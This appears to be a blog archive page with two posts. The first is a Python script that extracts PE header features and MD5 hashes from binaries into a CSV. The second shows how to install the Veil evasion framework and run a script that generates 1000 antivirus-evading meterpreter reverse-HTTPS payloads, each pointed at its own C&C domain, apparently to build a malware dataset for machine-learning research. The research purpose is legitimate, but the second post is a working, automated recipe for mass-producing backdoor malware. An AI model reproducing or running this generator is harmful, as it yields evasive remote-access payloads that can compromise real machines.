The Wandering Tech: August 2018

This post serves as a reminder on how to perform feature extraction of PE binaries using Python.

The code is based on Adobe's 2012 Malware Classifier, modified to suit my own purposes.

The code uses the pefile Python module to read and parse PE files.

My Purpose:
a) Extraction of PE file Header and Section information.
b) Compute MD5 sum of binary.
c) Save the information in a CSV file.

First, import the required Python libraries.

import os
import pefile
import pandas as pd
import hashlib

Next, define the function that computes the MD5 hash of a file given its filename. *The filename must be a full path if the binary is not in the same directory as the Python script.

def md5sum(filename, blocksize=65536):
    """Return the hexadecimal MD5 digest of the file at *filename*.

    The file is opened in binary mode and consumed in reads of *blocksize*
    bytes, so the whole file is never held in memory at once.
    """
    digest = hashlib.md5()
    with open(filename, "rb") as stream:
        while True:
            chunk = stream.read(blocksize)
            # An empty read marks the end of the file.
            if chunk == b"":
                break
            digest.update(chunk)
    return digest.hexdigest()

Next define a python class to represent the PE binary file.

class PEFile:
    """Feature record for a single PE binary.

    The file is parsed with ``pefile`` and selected header, section and
    import-table values are copied onto the instance as attributes.  Every
    instance attribute except ``pe`` is a feature; ``Construct`` returns them
    as a dictionary.  Attribute names and their assignment order are kept
    stable because ``Construct`` exposes them as dictionary keys.
    """

    def __init__(self, filename):
        """Parse *filename* and populate the feature attributes.

        Errors raised while opening or parsing the file propagate to the
        caller.
        """
        with open(filename, "rb") as file_content:
            self.pe = pefile.PE(data=file_content.read(), fast_load=True)
        optional_header = self.pe.OPTIONAL_HEADER
        data_directory = optional_header.DATA_DIRECTORY
        sections = self.pe.sections

        self.filename = filename
        self.DebugSize = data_directory[6].Size
        self.DebugRVA = data_directory[6].VirtualAddress
        self.ImageVersion = optional_header.MajorImageVersion
        self.OSVersion = optional_header.MajorOperatingSystemVersion
        self.ExportRVA = data_directory[0].VirtualAddress
        self.ExportSize = data_directory[0].Size
        self.IATRVA = data_directory[12].VirtualAddress
        self.ResSize = data_directory[2].Size
        self.LinkerVersion = optional_header.MajorLinkerVersion
        # A binary with fewer than two sections has no second section to
        # measure; record 0 rather than failing with IndexError.
        self.VirtualSize2 = sections[1].Misc_VirtualSize if len(sections) > 1 else 0
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = optional_header.SizeOfStackReserve
        self.Dll = optional_header.DllCharacteristics

        # fast_load=True skipped the data directories; parse them now so the
        # import table can be inspected.
        self.pe.parse_data_directories()
        dll_count, function_count = self._count_imports(self.pe)
        # ImportFunctionCount holds the number of import entries (one per
        # imported DLL); ImportFunctionMethodCount holds the total number of
        # imported symbols across all entries.
        self.ImportFunctionCount = dll_count
        self.ImportFunctionMethodCount = function_count
        self.md5hash = md5sum(filename)
        print ("Loaded PE File")

    @staticmethod
    def _count_imports(pe):
        """Return ``(entry_count, symbol_count)`` for the import table of *pe*."""
        # pefile only creates DIRECTORY_ENTRY_IMPORT when the binary actually
        # has an import directory, so treat a missing attribute as "no imports".
        entries = getattr(pe, "DIRECTORY_ENTRY_IMPORT", [])
        entry_count = 0
        symbol_count = 0
        for entry in entries:
            entry_count += 1
            symbol_count += sum(1 for _ in entry.imports)
        return entry_count, symbol_count

    def Construct(self):
        """Return the features as a dict: every instance attribute except ``pe``."""
        sample = {
            feature: value
            for feature, value in self.__dict__.items()
            if feature != "pe"
        }
        print ("Construct completed")
        return sample

Next, a function that walks a directory looking for PE files. The PE header and section information of each file is extracted, stored in a Python dictionary, and returned.

def pe2vec(directory=None):
    """Extract features from every file found under *directory*.

    Args:
        directory: Root folder to search recursively.  When omitted, the
            original hard-coded sample folder is used.

    Returns:
        A dict mapping each file's base name to the feature dict returned by
        ``PEFile.Construct()``.  Files that fail to load are reported on
        stdout and left out.
    """
    if directory is None:
        directory = "C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"

    # dataset maps file name -> feature dict
    dataset = {}

    # Recursively search for files within the directory and its subdirectories
    for subdir, _dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            try:
                # read the PE file using the pefile-backed wrapper class
                pe = PEFile(file_path)
                # NOTE: the key is the base name only, so two files with the
                # same name in different subdirectories overwrite each other.
                dataset[str(f)] = pe.Construct()
            except Exception as e:
                # Best-effort scan: report which file failed and carry on.
                print ("{}: {}".format(file_path, e))
    return dataset

Method to save python dictionary returned by pe2vec() function to a CSV file.

def saveToCSV(dataset, output_path=None):
    """Write *dataset* to a CSV file with one row per sample.

    Args:
        dataset: Dict mapping a sample name to its feature dict, as returned
            by ``pe2vec()``.
        output_path: Destination CSV file.  When omitted, the original
            hard-coded location is used.
    """
    if output_path is None:
        output_path = 'C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv'
    # DataFrame(dataset) puts samples in columns; transpose so that each
    # sample becomes a row and each feature a column.
    infected = pd.DataFrame(dataset).transpose()
    infected.to_csv(output_path, sep=',', encoding='utf-8')

Full Code is shown below:

import os
import pefile
import pandas as pd
import hashlib

def md5sum(filename, blocksize=65536):
    """Compute the MD5 checksum of a file and return it as a hex string.

    Reads the file in binary mode, *blocksize* bytes at a time, feeding each
    piece to the running hash.
    """
    digest = hashlib.md5()
    with open(filename, "rb") as stream:
        while True:
            chunk = stream.read(blocksize)
            # Stop once a read comes back empty (end of file).
            if chunk == b"":
                break
            digest.update(chunk)
    return digest.hexdigest()

class PEFile:
    """Feature record for a single PE binary.

    The file is parsed with ``pefile`` and selected header, section and
    import-table values are copied onto the instance as attributes.  Every
    instance attribute except ``pe`` is a feature; ``Construct`` returns them
    as a dictionary.  Attribute names and their assignment order are kept
    stable because ``Construct`` exposes them as dictionary keys.
    """

    def __init__(self, filename):
        """Parse *filename* and populate the feature attributes.

        Errors raised while opening or parsing the file propagate to the
        caller.
        """
        with open(filename, "rb") as file_content:
            self.pe = pefile.PE(data=file_content.read(), fast_load=True)
        optional_header = self.pe.OPTIONAL_HEADER
        data_directory = optional_header.DATA_DIRECTORY
        sections = self.pe.sections

        self.filename = filename
        self.DebugSize = data_directory[6].Size
        self.DebugRVA = data_directory[6].VirtualAddress
        self.ImageVersion = optional_header.MajorImageVersion
        self.OSVersion = optional_header.MajorOperatingSystemVersion
        self.ExportRVA = data_directory[0].VirtualAddress
        self.ExportSize = data_directory[0].Size
        self.IATRVA = data_directory[12].VirtualAddress
        self.ResSize = data_directory[2].Size
        self.LinkerVersion = optional_header.MajorLinkerVersion
        # A binary with fewer than two sections has no second section to
        # measure; record 0 rather than failing with IndexError.
        self.VirtualSize2 = sections[1].Misc_VirtualSize if len(sections) > 1 else 0
        self.NumberOfSections = self.pe.FILE_HEADER.NumberOfSections
        self.StackReserveSize = optional_header.SizeOfStackReserve
        self.Dll = optional_header.DllCharacteristics

        # fast_load=True skipped the data directories; parse them now so the
        # import table can be inspected.
        self.pe.parse_data_directories()
        dll_count, function_count = self._count_imports(self.pe)
        # ImportFunctionCount holds the number of import entries (one per
        # imported DLL); ImportFunctionMethodCount holds the total number of
        # imported symbols across all entries.
        self.ImportFunctionCount = dll_count
        self.ImportFunctionMethodCount = function_count
        self.md5hash = md5sum(filename)
        print ("Loaded PE File")

    @staticmethod
    def _count_imports(pe):
        """Return ``(entry_count, symbol_count)`` for the import table of *pe*."""
        # pefile only creates DIRECTORY_ENTRY_IMPORT when the binary actually
        # has an import directory, so treat a missing attribute as "no imports".
        entries = getattr(pe, "DIRECTORY_ENTRY_IMPORT", [])
        entry_count = 0
        symbol_count = 0
        for entry in entries:
            entry_count += 1
            symbol_count += sum(1 for _ in entry.imports)
        return entry_count, symbol_count

    def Construct(self):
        """Return the features as a dict: every instance attribute except ``pe``."""
        sample = {
            feature: value
            for feature, value in self.__dict__.items()
            if feature != "pe"
        }
        print ("Construct completed")
        return sample
    
def pe2vec(directory=None):
    """Extract features from every file found under *directory*.

    Args:
        directory: Root folder to search recursively.  When omitted, the
            original hard-coded sample folder is used.

    Returns:
        A dict mapping each file's base name to the feature dict returned by
        ``PEFile.Construct()``.  Files that fail to load are reported on
        stdout and left out.
    """
    if directory is None:
        directory = "C:\\Users\\chia0\\Downloads\\dissertation\\malware\\malware\\metasploit_samples\\temp"

    # dataset maps file name -> feature dict
    dataset = {}

    # Recursively search for files within the directory and its subdirectories
    for subdir, _dirs, files in os.walk(directory):
        for f in files:
            file_path = os.path.join(subdir, f)
            try:
                # read the PE file using the pefile-backed wrapper class
                pe = PEFile(file_path)
                # NOTE: the key is the base name only, so two files with the
                # same name in different subdirectories overwrite each other.
                dataset[str(f)] = pe.Construct()
            except Exception as e:
                # Best-effort scan: report which file failed and carry on.
                print ("{}: {}".format(file_path, e))
    return dataset
    
def saveToCSV(dataset, output_path=None):
    """Write *dataset* to a CSV file with one row per sample.

    Args:
        dataset: Dict mapping a sample name to its feature dict, as returned
            by ``pe2vec()``.
        output_path: Destination CSV file.  When omitted, the original
            hard-coded location is used.
    """
    if output_path is None:
        output_path = 'C:\\Users\\chia0\\Downloads\\dissertation\\malware\\dataset_m641.csv'
    # DataFrame(dataset) puts samples in columns; transpose so that each
    # sample becomes a row and each feature a column.
    infected = pd.DataFrame(dataset).transpose()
    infected.to_csv(output_path, sep=',', encoding='utf-8')
    
# Run the extraction only when this file is executed as a script, so that
# importing it for its functions does not scan the disk or write the CSV.
if __name__ == "__main__":
    pedata = pe2vec()
    saveToCSV(pedata)

This post serves as a journal of the technique used for automating generation of VEIL payloads.
https://github.com/Veil-Framework

Objective: Generation of 1000 VEIL payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: The VEIL framework is a payload generation framework designed to evade anti-virus detection.

Overview:
1) On a Kali Linux VM

2) Install VEIL framework

# Refresh the package index, install the veil package, then run its bundled setup script.
apt update

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

3) Open gedit and copy in the Python script below. Save it in the Veil directory (/usr/share/veil) as veil_malware_generation_script.py.

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import socket
from socket import error as socket_error
import errno

import subprocess
from subprocess import Popen

# Read the input list. Columns are used by position: column 0 is the C&C
# domain handed to Veil, column 1 is the output name of the payload.
print ("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
df.info()
df.describe()
print ("Loaded domain name file")
print("")

# Text looked for in Veil's stdout: the first marks a finished payload,
# the second a failure that is retried.
correctmsg = "Metasploit Resource file written to:"
errmsg = "bignum too big to convert"

# Rows whose index is below this value are skipped.
startfrom = 0

for index, row in df.iterrows():
    # Read both columns by position once. .iloc is explicit positional
    # access; plain row[0] on a label-indexed Series is deprecated in pandas.
    host = row.iloc[0]
    outname = row.iloc[1]

    if startfrom > index:
        print ("skip: " + str(outname))
        continue

    attempt = 1
    # The lookup is only a resolvability check: the payload is still built
    # with the domain name, not with the resolved address.
    try:
        addr = socket.gethostbyname(host)
        print(addr)
    except socket_error as serr:
        # errno -2 is treated as "name cannot be resolved" (presumably
        # EAI_NONAME on Linux -- TODO confirm on other platforms). Any other
        # resolver error leaves the domain unchanged.
        if serr.errno == -2:
            print ("Domain: " + host + " is unresolvable, using default IP value instead.")
            host = "127.0.0.1"

    # Shown for logging only; the real invocation below also passes -o.
    command = "-t Evasion -p cs/meterpreter/rev_https.py --ip " + host + " --port 443"
    binaryname = str(outname) + ".exe"
    print (command)

    # x is the position of the success marker in Veil's output; -1 means the
    # payload was not produced and the command is run again.
    # NOTE(review): there is no upper bound on retries, so a payload that
    # never succeeds keeps this loop running forever.
    x = -1
    while x == -1:
        # universal_newlines=True makes communicate() return text on both
        # Python 2 and Python 3, so the str.find() calls below work on either.
        proc = subprocess.Popen(
            ['./Veil.py', '-t', 'Evasion', '-p', 'cs/meterpreter/rev_https.py',
             '--ip', str(host), '--port', '443', '-o', str(outname)],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            universal_newlines=True)
        tmp = proc.communicate()[0]
        x = tmp.find(correctmsg)
        # -1 means errmsg was not found in the output
        i = tmp.find(errmsg)

        if i != -1:
            print ("retrying error crafting payload...: attempting " + str(attempt) + " times")
        if x == -1:
            print ("error: " + tmp)
        # Count each failed run once, even when both conditions above hold.
        if i != -1 or x == -1:
            attempt = attempt + 1

    print ("Command: " + command + " is successful.")
    print ("Saving as :" + binaryname)
    #subprocess.call('mv ./windows-meterpreter-staged-reverse-https-443.exe ./' + binaryname, shell=True)
    print ("Saved")
    print ("")

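4) Create a CSV file in Excel and save it as website.csv in the same directory as the script. The first row is a header row; in each following row, the first column is the C&C domain name and the second column is the name to give the generated binary.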

5) Execute the Python script

# Run from /usr/share/veil: the script launches ./Veil.py and reads ./website.csv by relative path.
cd /usr/share/veil
python veil_malware_generation_script.py

6) Generated malware are saved at /var/lib/veil/output/compiled

7) VEIL is really fast, about 20 minutes to generate the 1000 malware samples.

The Wandering Tech

Wednesday, August 29, 2018

Feature extraction of PEFiles using Python

Saturday, August 11, 2018

Automating generation of VEIL payloads

Labels

Followers

Blog Archive

About Me